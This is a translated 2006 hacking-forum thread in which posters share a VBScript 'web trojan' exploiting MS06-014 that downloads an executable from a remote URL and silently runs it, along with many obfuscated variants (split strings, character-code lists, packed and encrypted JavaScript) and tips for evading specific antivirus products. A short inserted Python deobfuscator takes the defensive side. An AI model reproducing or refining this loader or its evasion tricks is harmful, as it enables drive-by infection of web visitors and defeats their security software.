
[Original] A Way of Mutating the MS06014 Web Trojan


Author: h2k2 (_恒, QQ: 5454443)
Source: EvilOctal Information Security Team (www.eviloctal.com)

Here is the original code:
Code:
<script language="VBScript">
  on error resume next
  dl = "http://www.baidu.com/heng.exe"
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  str="Microsoft.XMLHTTP"
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6="GET"
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject("Shell.Application","")
  Q.ShellExecute fname1,"","","open",0
  </script>
Now look at the mutated code:
Code:
<script language="VBScript">
  on error resume next
  xx="object"
  xxx="classid"
  xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  xxxxx="Microsoft.XMLHTTP"
  xxxxxx="GET"
  xxxxxxx="Scripting.FileSystemObject"
  xxxxxxxx="Shell.Application"
  dl = "http://www.baidu.com/heng.exe"
  Set df = document.createElement(xx)
  df.setAttribute xxx, xxxx
  str=xxxxx
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6=xxxxxx
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject(xxxxxxx,"")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject(xxxxxxxx,"")
  Q.ShellExecute fname1,"","","open",0
  </script>
It is easy to see: I declared everything enclosed in quotes as variables, and then simply referenced the variables in the code.
Code:
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
This can be mutated further, into this:
Code:
  a1="Ado"
  a2="db."
  a3="Str"
  a4="ea"
  a5="m"
  str1=a1&a2&a3&a4&a5
Spot the difference? In fact every single character can be handled this way; I was just too lazy to do it, heh. Extrapolate from there yourselves.


Mutation, ho~~~, that is what 虫虫 is good at~~^_^~~

Here is my mutated version:
Code:
<script language=vbscript>
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
on error resume next
t="100,108,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,98,97,105,100,117,46,99,111,109,47,104,101,110,103,46,101,120,101,34,13,10,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,115,116,114,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,44,34,34,41,13,10,97,49,61,34,65,100,111,34,13,10,97,50,61,34,100,98,46,34,13,10,97,51,61,34,83,116,114,34,13,10,97,52,61,34,101,97,109,34,13,10,115,116,114,49,61,97,49,38,97,50,38,97,51,38,97,52,13,10,115,116,114,53,61,115,116,114,49,13,10,115,101,116,32,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,53,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,115,116,114,54,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,115,116,114,54,44,32,100,108,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,102,110,97,109,101,49,61,34,103,48,108,100,46,99,111,109,34,13,10,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,83,46,99,108,111,115,101,13,10,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48"
execute(rechange(t))
</script>
Haha~~~
That little tool is on the home page I just set up~ http://hi.baidu.com/anuiz
I was too lazy to modify the tool; it has a small problem when Chinese text is present. Change asc,chr in the tool to ascw,chrw and it works~
End of report. Heh
Criticism and advice are welcome~~
http://hi.baidu.com/anuiz anuiz#163.com


So many kinds of mutation, it is dazzling. Getting detected is really a problem now.
QHK-EST-EvilOctal: people who live for technology, long to study the beauty of technology, and forever chase the summit of technology!!!


虫虫's method should count as encryption~~
    For web trojan AV evasion I have always preferred not to encrypt; just modifying the code directly is enough, but sometimes it is really hard to handle, sigh.


Pure encryption gets caught by the AV's file-stream detection.
When I tested, pure encryption was flagged by KV.
After I changed the “Shell.Application” component call it was no longer detected.


Don't use pure encryption. My tool is not a finished product; if the code you generate after mutation gets detected, just tweak it a little more.
This is the same thing as the JS mutation AV evasion I posted before.
http://hi.baidu.com/anuiz anuiz#163.com


The advantage of encryption is that it gets past many AVs, but that is hard to achieve by manual modification.
These days I basically only check whether it passes Kaspersky; once it passes Kaspersky, the others don't need checking.
http://hi.baidu.com/anuiz anuiz#163.com


虫虫's VBS encryptor is really quite nice. I call it "insecticide", specially for killing 虫虫 (bugs)...
Uncle Li is very angry


Quote:
Quoting post #6 by 虫虫, posted 2006-08-03 08:17:
The advantage of encryption is that it gets past many AVs, but that is hard to achieve by manual modification.
These days I basically only check whether it passes Kaspersky; once it passes Kaspersky, the others don't need checking.
For web trojans, Kaspersky is easy to pass; I find McAfee hard to pass.


Quote:
Quoting post #4 by 优格, posted 2006-08-03 00:03:
Pure encryption gets caught by the AV's file-stream detection.
When I tested, pure encryption was flagged by KV.
After I changed the “Shell.Application” component call it was no longer detected.
Can you explain in detail how you did it~~


<script language="VBScript">
on error resume next
dl = http://www.163vc.com
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
I just can't get it to work no matter what. Could the seniors take a look for me?


Actually, "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
changed to "clsid:B"&"D96C55"&"6-65A"&"3-11"&"D0-9"&"83A-"&"00C0"&"4FC"&"29E36" works too, and gets past some AVs, but Kaspersky just won't let you go.
Variable names can be changed as well, as long as you don't break the program. But after the AV updates a few days later it may fail again.
The advantage of the mutation I did above is that there are few keywords, so it is easy to modify. --- that is me blowing my own horn, heh.

Later I felt these are all very shallow things, sigh. Turns out I have always been this shallow, and was proud of it... lost~
http://hi.baidu.com/anuiz anuiz#163.com


First convert it to JS:
Code:
document.writeln("<html>");
document.writeln(" <script language=\"VBScript\">");
document.writeln("   on error resume next");
document.writeln("   dl = \"http:\/\/www.baidu.com\/go.exe\"");
document.writeln("   Set df = document.createElement(\"object\")");
document.writeln("   df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln("   str=\"Microsoft.XMLHTTP\"");
document.writeln("   Set x = df.CreateObject(str,\"\")");
document.writeln("   a1=\"Ado\"");
document.writeln("   a2=\"db.\"");
document.writeln("   a3=\"Str\"");
document.writeln("   a4=\"eam\"");
document.writeln("   str1=a1&a2&a3&a4");
document.writeln("   str5=str1");
document.writeln("   set S = df.createobject(str5,\"\")");
document.writeln("   S.type = 1");
document.writeln("   str6=\"GET\"");
document.writeln("   x.Open str6, dl, False");
document.writeln("   x.Send");
document.writeln("   fname1=\"Ravwon.exe\"");
document.writeln("   set F = df.createobject(\"Scripting.FileSystemObject\",\"\")");
document.writeln("   set tmp = F.GetSpecialFolder(2) ");
document.writeln("   fname1= F.BuildPath(tmp,fname1)");
document.writeln("   S.open");
document.writeln("   S.write x.responseBody");
document.writeln("   S.savetofile fname1,2");
document.writeln("   S.close");
document.writeln("   set Q = df.createobject(\"Shell.Application\",\"\")");
document.writeln("   Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln("   <\/script>");
document.writeln("   <head>");
document.writeln("   <title>fuck all hacker<\/title>");
document.writeln("   <\/head><body>");
document.writeln("  <center><\/center>");
document.writeln("   <\/body><\/html>")
Then mutate it:
Code:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.4("<p>");3.4(" <m L=\\"M\\">");3.4("   N I J K");3.4("   9 = \\"O:\\/\\/U.V.W\\/P.c\\"");3.4("   f 5 = 3.R(\\"T\\")");3.4("   5.H \\"v\\", \\"w:y-s-t-u-z\\"");3.4("   g=\\"D.E\\"");3.4("   f x = 5.A(g,\\"\\")");3.4("   d=\\"C\\"");3.4("   e=\\"X.\\"");3.4("   j=\\"1b\\"");3.4("   k=\\"1c\\"");3.4("   h=d&e&j&k");3.4("   i=h");3.4("   7 S = 5.8(i,\\"\\")");3.4("   S.1e = 1");3.4("   a=\\"18\\"");3.4("   x.11 a, 9, Y");3.4("   x.Z");3.4("   6=\\"16.c\\"");3.4("   7 F = 5.8(\\"15.13\\",\\"\\")");3.4("   7 b = F.14(2) ");3.4("   6= F.10(b,6)");3.4("   S.n");3.4("   S.1f x.19");3.4("   S.17 6,2");3.4("   S.1a");3.4("   7 Q = 5.8(\\"G.B\\",\\"\\")");3.4("   Q.12 6,\\"\\",\\"\\",\\"n\\",0");3.4("   <\\/m>");3.4("   <o>");3.4("   <l>1g 1h 1d<\\/l>");3.4("   <\\/o><q>");3.4("  <r><\\/r>");3.4("   <\\/q><\\/p>")',62,80,'|||document|writeln|df|fname1|set|createobject|dl|str6|tmp|exe|a1|a2|Set|str|str1|str5|a3|a4|title|script|open|head|html|body|center|65A3|11D0|983A|classid|clsid||BD96C556|00C04FC29E36|CreateObject|Application|Ado|Microsoft|XMLHTTP||Shell|setAttribute|error|resume|next|language|VBScript|on|http|go||createElement||object|www|baidu|com|db|False|Send|BuildPath|Open|ShellExecute|FileSystemObject|GetSpecialFolder|Scripting|Ravwon|savetofile|GET|responseBody|close|Str|eam|hacker|type|write|fuck|all'.split('|'),0,{}))
It can't get past the memory scan.... depressing!!
http://1v1.name


1. Split each variable name and merge in junk characters, e.g.
Quote:
set Q = evil.createobject("Shel"&QQ30039780&RAyH4c&"l.Appl"&"ication","")
2. The order of the variables that create the components can also be shuffled.

3. Then encrypt with HTML-to-JS~ guaranteed fully undetected, and the web trojan is just one JS file, very convenient.

4. Or simply rewrite the script, referring to 冰狐's classic web trojan scripts from before.
.....  -.= 凸


虫虫, after encrypting with your tool and opening the web trojan, the IE status bar shows "Done, but with errors on page". Why is that?


Article author: Rising does not flag the file, so why does opening the web trojan trigger a virus alert? How should I modify it?

I can't post the image; Rising reports this:


Virus name: Trojan.DL.VBS.Agent.j
Process name: "C:\Program Files\Internet Explorer\iexplore.exe"
File path: C:\DOCUME~1\宇\LOCALS~1\Temp\43244250456.tmp


<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=iunm> !=tdsjqu!mbohvbhf>#WCTdsjqu#> !!!!po!fssps!sftvnf!ofy","u !!!!em!>!#iuuq;00xxx/bvl/dp/ls0jodmvef0ifmq0joefy/fyf# !!","!!Tfu!eg!>!epdvnfou/dsfbufFmfnfou)#pckfdu#* !!!!eg/tfuBuusjc","vuf!#dmbttje#-!#dmtje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47# ","!!!!tus>#Njdsptpgu/YNMIUUQ# !!!!Tfu!y!>!eg/DsfbufPckfdu)tus-","##* !!!!b2>#Bep# !!!!b3>#ec/# !!!!b4>#Tus# !!!!b5>#fbn# ","!!!!tus2>b2'b3'b4'b5 !!!!tus6>tus2 !!!!tfu!T!>!eg/dsfbufpck","fdu)tus6-##* !!!!T/uzqf!>!2 !!!!tus7>#HFU# !!!!y/Pqfo!tus7","-!em-!Gbmtf !!!!y/Tfoe !!!!gobnf2>#h1me/dpn# !!!!tfu!G!>!e","g/dsfbufpckfdu)#Tdsjqujoh/GjmfTztufnPckfdu#-##* !!!!tfu!unq!",">!G/HfuTqfdjbmGpmefs)3*! !!!!gobnf2>!G/CvjmeQbui)unq-gobnf2*"," !!!!T/pqfo !!!!T/xsjuf!y/sftqpotfCpez !!!!T/tbwfupgjmf!go","bnf2-3 !!!!T/dmptf !!!!tfu!R!>!eg/dsfbufpckfdu)#Tifmm/Bqqmj","dbujpo#-##* !!!!R/TifmmFyfdvuf!gobnf2-##-##-#pqfo#-1 !!!!=0","tdsjqu> !!!!=ifbe> !!!!=ujumf>Pi-nz!hpe!!!Hpmetvo[bu^9","5934825=0ujumf> !!!!=0ifbe>=cpez>  =dfoufs>Zpv!EP!ju=","0dfoufs> !!!!=0cpez>=0iunm> "];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
   i = st.charCodeAt(a);
   if (i==1)
    varS=varS+String.fromCharCode('"'.charCodeAt()-1);
   else if (i==2) {
    a++;
    varS+=String.fromCharCode(st.charCodeAt(a));
    }
   else
    varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=17;
function S(){
for(i=0;i<num;i++)
  document.write(psw(HtmlStrings));}
S();
// -->
</SCRIPT>
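Added example, not from this thread or any of its posters: a small Python deobfuscator of the kind a defender or analyst would run against the two encodings shown in this thread, the comma-separated Chr() code list in 虫虫's post and the +1 character shift that psw() above reverses. It decodes constructed samples, folds split string literals such as "Ado"&"db." back together, and reports which of the loader's COM ProgIDs appear; all sample strings and function names here are my own.

```python
import re

# Constructed samples (not the thread's payloads): two short VBScript lines
# encoded with the two schemes the thread shows.
CHR_LIST_SAMPLE = ("115,101,116,32,83,32,61,32,100,102,46,99,114,101,97,116,101,111,"
                   "98,106,101,99,116,40,34,65,100,111,34,38,34,100,98,46,34,38,34,"
                   "83,116,114,34,38,34,101,97,109,34,44,34,34,41")
SHIFT_SAMPLE = "Tfu!R!>!eg/dsfbufpckfdu)#Tifmm/Bqqmjdbujpo#-##*"

# COM ProgIDs the thread's loader chains together; seeing them after decoding
# is the detection signal, whatever variable names the author chose.
PROGIDS = ("Adodb.Stream", "Microsoft.XMLHTTP",
           "Scripting.FileSystemObject", "Shell.Application")

def decode_chr_list(blob):
    """Reverse rechange(): comma-separated character codes -> text."""
    return "".join(chr(int(n)) for n in blob.split(",") if n.strip())

def decode_shift(blob):
    """Reverse psw(): code 1 -> '!', code 2 escapes the next char, else code-1."""
    out, i = [], 0
    while i < len(blob):
        c = ord(blob[i])
        if c == 1:
            out.append("!")
        elif c == 2 and i + 1 < len(blob):
            i += 1
            out.append(blob[i])
        else:
            out.append(chr(c - 1))
        i += 1
    return "".join(out)

_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')

def fold_concats(src):
    """Join adjacent literal concatenations, "Ado"&"db." -> "Adodb.", to a fixpoint."""
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src

def find_progids(src):
    """Return the loader ProgIDs present in decoded source, ignoring case and splits."""
    folded = fold_concats(src).lower()
    return sorted(p for p in PROGIDS if p.lower() in folded)

if __name__ == "__main__":
    for sample, dec in ((CHR_LIST_SAMPLE, decode_chr_list), (SHIFT_SAMPLE, decode_shift)):
        text = dec(sample)
        print(text, "->", find_progids(text))
```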


Quote:
Article author: Rising does not flag the file, so why does opening the web trojan trigger a virus alert? How should I modify it?

I can't post the image; Rising reports this:


Virus name: Trojan.DL.VBS.Agent.j
Process name: "C:\Program Files\Internet Explorer\iexplore.exe"
File path: C:\DOCUME~1\宇\LOCALS~1\Temp\43244250456.tmp


It is not the trojan being detected! Both the trojan and the web trojan are undetected, but as soon as the link is opened Rising reports a virus... The poster above mentioned adding junk code; how do you write junk code, and where do you add it?


Change the variable names and the names of the called components, split them up, and that's it...
Kaspersky 06's in-memory detection is a bit tough, but shuffling the order of the code does the trick...


McAfee only flags the S.savetofile line; just change that and it's fine. Don't know about the others.


A question. Web trojans usually contain UNICODE like %u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243. How do you decode that?


This method is good, but there are many kinds of mutation; a change of thinking might produce even better methods!


If the line set Q = df.createobject("Shell.Application","") or the line <script language="VBScript"> gets detected, how should it be mutated?


Code:
<SCRIPT LANGUAGE="JavaScript">
<!--
function decrypt(str, pwd) {
if(str == null || str.length < 8) {
  alert("A salt value could not be extracted from the encrypted message because it's length is too short. The message cannot be decrypted.");
  return;
}
if(pwd == null || pwd.length <= 0) {
  alert("Please enter a password with which to decrypt the message.");
  return;
}
var prand = "";
for(var i=0; i<pwd.length; i++) {
  prand += pwd.charCodeAt(i).toString();
}
var sPos = Math.floor(prand.length / 5);
var mult = parseInt(prand.charAt(sPos) + prand.charAt(sPos*2) + prand.charAt(sPos*3) + prand.charAt(sPos*4) + prand.charAt(sPos*5));
var incr = Math.round(pwd.length / 2);
var modu = Math.pow(2, 31) - 1;
var salt = parseInt(str.substring(str.length - 8, str.length), 16);
str = str.substring(0, str.length - 8);
prand += salt;
while(prand.length > 10) {
  prand = (parseInt(prand.substring(0, 10)) + parseInt(prand.substring(10, prand.length))).toString();
}
prand = (mult * prand + incr) % modu;
var enc_chr = "";
var enc_str = "";
for(var i=0; i<str.length; i+=2) {
  enc_chr = parseInt(parseInt(str.substring(i, i+2), 16) ^ Math.floor((prand / modu) * 255));
  enc_str += String.fromCharCode(enc_chr);
  prand = (mult * prand + incr) % modu;
}
return enc_str;
}
dl = "http://www2.sjzue.edu.cn/ray.exe"
var hk="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"
document.write(decrypt(hk,'3800'))
//-->
</SCRIPT>
Strong encryption. Heh heh.


Split the variables, partially encrypt, then shuffle the variable order

~HTML TO JS

~preferably JS encryption

Absolutely undetected, except for McAfee's and some other AVs' script-execution prompts.

Attachment

pack.rar (4 KB)

2006-8-25 11:59, downloads: 232

.....  -.= 凸
